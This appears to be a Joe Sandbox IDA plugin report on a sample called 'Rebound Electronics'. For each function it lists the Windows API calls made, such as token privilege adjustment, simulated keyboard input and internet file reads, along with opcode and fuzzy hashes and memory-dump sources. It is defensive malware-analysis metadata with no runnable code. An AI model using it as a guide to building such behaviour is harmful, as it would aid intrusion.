Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: d5af8b93994eb2a589b57bf952b8e0bafd0baef166740e92893bd70c4a3fadf0
Instruction ID: 165378e1119e3dcbc871de2ef0c254ceab270cbf5dfa66a15a81892ba13e5b7d
Opcode Fuzzy Hash: d5af8b93994eb2a589b57bf952b8e0bafd0baef166740e92893bd70c4a3fadf0
Instruction Fuzzy Hash: CF41BE396043019FCB18DF28C4D1A9AB3E4FF49324F10455EE96A8B3A1DB31A945CB91

Function 00C88111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00C88160
IsWindowEnabled.USER32 ref: 00C8816E
GetForegroundWindow.USER32(?,?,00000001), ref: 00C8817B
IsIconic.USER32 ref: 00C88189
IsZoomed.USER32 ref: 00C88197

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: eab04727fd105b8b24c7f550b05a6b1fbfbf32091717f389828d973f8373e843
Instruction ID: b50cf51ae7c87fd5852b745f277491683884a4c083e80a8065335d02b949860a
Opcode Fuzzy Hash: eab04727fd105b8b24c7f550b05a6b1fbfbf32091717f389828d973f8373e843
Instruction Fuzzy Hash: DA11B2317002116FEB217F26DC48B6F779CEF45768B444429F84AD7641CF34A90687A8

Function 00C29B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00C29EA7
VUUU, xrefs: 00C29E95
VUUU, xrefs: 00CABE14
ERCP, xrefs: 00C29C32
VUUU, xrefs: 00C29ED4

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: f2142ee5a57b21138f9ba89acc9450ef9b64348254691e5fcb472044ef9d9549
Instruction ID: 7cf9db56775de32a7bd54fa2047a2ff988996ddc0d748e0699f9f9352585c0dd
Opcode Fuzzy Hash: f2142ee5a57b21138f9ba89acc9450ef9b64348254691e5fcb472044ef9d9549
Instruction Fuzzy Hash: 94928171E0022ACBDF24CF59D8807BDB7B1FB55318F14819AD82AAB681D7709E81DF91

Function 00C3E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C3E014,74DF0AE0,00C3DEF1,00CBDC38,?,?), ref: 00C3E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C3E03E

Strings

GetNativeSystemInfo, xrefs: 00C3E038
kernel32.dll, xrefs: 00C3E027

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 6e6c4c1ca1baf906ffa6261b137b5ed5416561f5b6a0e270b76103778d229ebd
Instruction ID: d531991be2a4d3a296a35ff6d3443b660a783a021d24fdb30b83dfcebf6cccfd
Opcode Fuzzy Hash: 6e6c4c1ca1baf906ffa6261b137b5ed5416561f5b6a0e270b76103778d229ebd
Instruction Fuzzy Hash: A7D0A7304107129FC7354FA0EC0875A77D4AF11315F18442AE593D3A90D7B4C8808F50

Function 00C613CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C613DC

Strings

(, xrefs: 00C61422
|, xrefs: 00C6140C

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 687426962ec370a17c3ec1a022e0add852d5ef582fbfda4c370e28a27a4de2f0
Instruction ID: 33a0dd43d7298cfae1d4820dceff38898170d00fc92e20447236f8ec5cb68452
Opcode Fuzzy Hash: 687426962ec370a17c3ec1a022e0add852d5ef582fbfda4c370e28a27a4de2f0
Instruction Fuzzy Hash: AD320675A007059FC728CF69C49196AB7F0FF48320B19C56EE9AADB3A2D770E941CB44

Function 00C3B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 00C3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C3B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 00C3B22F

Part of subcall function 00C3B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00C3B5A5

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: af7e83c534af408fe9f5e57cef1bcef85d5b003b9a3bb296e823f1f2474ae50c
Instruction ID: e8c5b490e91842598ae0e63a5bb9c3843c6fb014dc33c1b36ef9926b646816bc
Opcode Fuzzy Hash: af7e83c534af408fe9f5e57cef1bcef85d5b003b9a3bb296e823f1f2474ae50c
Instruction Fuzzy Hash: 4AA178B0134005BADF28AF2B8C8DEBF695CEF56344F14431DFA12D6592DB269E01E272

Function 00C74EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C743BF,00000000), ref: 00C74FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C74FD2

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 899bf013bfaed2f8aee981d0a8b3a1778b267f92e65ba94a0b493f975d537da6
Instruction ID: 054498f2cd51a3358c930d6250002d27f506934f43087a91954c4d5a80ef38d5
Opcode Fuzzy Hash: 899bf013bfaed2f8aee981d0a8b3a1778b267f92e65ba94a0b493f975d537da6
Instruction Fuzzy Hash: 7541D671504609BFEB259ED5CC81FBFB7BCEB40764F10802AF619A6181EBB19E4196A0

Function 00C6E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C6E20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C6E267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00C6E2B4

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 3a9c8422c1aa26bab4eb5202c4510e41e0077a8476a61e1fdd3fbe217a3d84ed
Instruction ID: ed9a3d973ca61b573604b274f1dcbc0affe68135f78fe2d6ef6ec02df000ccf7
Opcode Fuzzy Hash: 3a9c8422c1aa26bab4eb5202c4510e41e0077a8476a61e1fdd3fbe217a3d84ed
Instruction Fuzzy Hash: 7E216A35A00218EFCB00EFA5D8C4BADBBB8FF49314F0484AAE906AB251DB319905CB50

Function 00C5B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00C3F4EA: std::exception::exception.LIBCMT ref: 00C3F51E
Part of subcall function 00C3F4EA: __CxxThrowException@8.LIBCMT ref: 00C3F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5B180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C5B1AD
GetLastError.KERNEL32 ref: 00C5B1BA

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: bc24dfca87108aa6fa63ceb03744c2725861a1ca63bd1448759520b0c23c0c2a
Instruction ID: aa9f47cda2fa61254c92a13a89e2212dda8f17fbe9fd9b080ce8d836521e1f84
Opcode Fuzzy Hash: bc24dfca87108aa6fa63ceb03744c2725861a1ca63bd1448759520b0c23c0c2a
Instruction Fuzzy Hash: ED11BFB2810604AFE7189F54DCC5E2FBBBCEB44311B20892EE45697240DB70FC468B64

Function 00C66685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C666AF
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00C666EC
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C666F5

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 6a8c47247628a9433465c2c3ea399a1058a1919e9c16a0a6ffab700c8204323c
Instruction ID: 0d9429d118849f1e183345f41e57c21b4a88050de2c033dcd0d90f3ef2e3f8e8
Opcode Fuzzy Hash: 6a8c47247628a9433465c2c3ea399a1058a1919e9c16a0a6ffab700c8204323c
Instruction Fuzzy Hash: 7F11C8B1901228BFE7108BA8DC85FAF77BCEB05718F004655F912E7190C2749E0487E5

Function 00C671FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C67223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C6723A
FreeSid.ADVAPI32(?), ref: 00C6724A

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 522e0bbd3d278b59d614ca9ea0706e19a04c508a343b319fbb127b7638dd34f4
Instruction ID: 0554bc36c98b04a0cc143fce131c836affb147e61d817eb1ca41d38a59919af9
Opcode Fuzzy Hash: 522e0bbd3d278b59d614ca9ea0706e19a04c508a343b319fbb127b7638dd34f4
Instruction Fuzzy Hash: B7F0F476A04209BBDB04DBE4DD99BEEBBB8EB09205F104869A603E3591E2709A448B10

Function 00C6F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C6F599
FindClose.KERNEL32(00000000), ref: 00C6F5C9

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 985efc81d1c9c0ea0c70f2e598d23d929d7b047223869d3163c21beefb8ec283
Instruction ID: 468617d2463eafac319c2558a96f9211aa8680692b136b2ee65080d722b92857
Opcode Fuzzy Hash: 985efc81d1c9c0ea0c70f2e598d23d929d7b047223869d3163c21beefb8ec283
Instruction Fuzzy Hash: 611188716146009FDB10EF29D845A2EB7E5FF85324F00851EF9A6D7291DB34AD058B85

Function 00C6CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00C7BE6A,?,?,00000000,?), ref: 00C6CEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00C7BE6A,?,?,00000000,?), ref: 00C6CEB9

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 1307f9d754b2e5cf59f5088e4bfa19f063e27f95a1aa0f1a588a4b58f6eb1cb8
Instruction ID: 1fe734ca4c5ca64b4b11a1796828727bf3d905745012585a1ce2d3f0241e0a1f
Opcode Fuzzy Hash: 1307f9d754b2e5cf59f5088e4bfa19f063e27f95a1aa0f1a588a4b58f6eb1cb8
Instruction Fuzzy Hash: FFF08C71500229ABDB20ABA4DC89FFE777DBF093A5F008165F91AD7191D6709A40CBA0

Function 00C6411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C64153
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00C64166

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 0e17eca36ef3948660d86c8c46ea2c415fdf78d9a71449f82fc72c9451d560e1
Instruction ID: 3b86fd912f7baff88f1aa36df87229e3a5f8df7d06051f835ea26064a76fca90
Opcode Fuzzy Hash: 0e17eca36ef3948660d86c8c46ea2c415fdf78d9a71449f82fc72c9451d560e1
Instruction Fuzzy Hash: 06F067B080024DAFDB098FA0C805BBE7BB0EF01309F00800AF966A6192D77986129FA0

Function 00C5AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C5ACC0), ref: 00C5AB99
CloseHandle.KERNEL32(?,?,00C5ACC0), ref: 00C5ABAB

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 096f534e1989b09c83f0f87ba47156bd78a219e8117dd12b21ede23346d3e220
Instruction ID: 169588d4594a1bb731296840f2a957e98935d9fde1735ace21d9dd713c6caa53
Opcode Fuzzy Hash: 096f534e1989b09c83f0f87ba47156bd78a219e8117dd12b21ede23346d3e220
Instruction Fuzzy Hash: 4CE0E675410510AFE7262F55EC05E777BE9EF04321B10892DF85B81870D7625D91DB54

Function 00C481AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00C46DB3,-0000031A,?,?,00000001), ref: 00C481B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C481BA

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3bbbaf25cd5c3f64fac2334c8588768dedbbccbbd1c9438c98013ddfdbbaba91
Instruction ID: 8e5f19aff1211926e213f23b24374230532f183019d871fb25d0d59ae901338d
Opcode Fuzzy Hash: 3bbbaf25cd5c3f64fac2334c8588768dedbbccbbd1c9438c98013ddfdbbaba91
Instruction Fuzzy Hash: 5BB09231045608ABDF002BA1EC0DB5C7F78EB0A65AF004010F60F468718B7294508B92

Function 00C277B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C27921

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 21c67e421f3d76860998385385150e7b6a52c4f9824b94019237a363e332b6dd
Instruction ID: 4258872b938388d67344f08b1c655187062fdd399fc401c670c5a63f7873ae0f
Opcode Fuzzy Hash: 21c67e421f3d76860998385385150e7b6a52c4f9824b94019237a363e332b6dd
Instruction Fuzzy Hash: 9EA25C74D04229CFCB24CF59D8847ADBBB1FF49314F2582A9E869AB790D7309E81DB50

Function 00C4D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f5a04987fc13a76780a3da641b655fac1ed7d67d862a11b83a006b96f330e5b
Instruction ID: 296fff6a2fda13e4c397050102fd3f13dc12b44a70b82e38fbe39a5776a6c4d5
Opcode Fuzzy Hash: 5f5a04987fc13a76780a3da641b655fac1ed7d67d862a11b83a006b96f330e5b
Instruction Fuzzy Hash: 67321632D29F014DD7236634D86233AA298BFB73D5F15D727E82AB59AADF29C5834100

Function 00C296C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: d4ca4e3d9e9cc0a0780a29f62e14f009bfd3ab05266994f775ffa9cce0dec26a
Instruction ID: 2850246c4083ea44f470f3e0746b0a02cc17db746dcc0ba224358eac8a67295d
Opcode Fuzzy Hash: d4ca4e3d9e9cc0a0780a29f62e14f009bfd3ab05266994f775ffa9cce0dec26a
Instruction Fuzzy Hash: EA22A9716083109FDB24DF24D890B6FB7E4EF88710F10492DF8AA9B291DB71E945DB92

Function 00C5038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
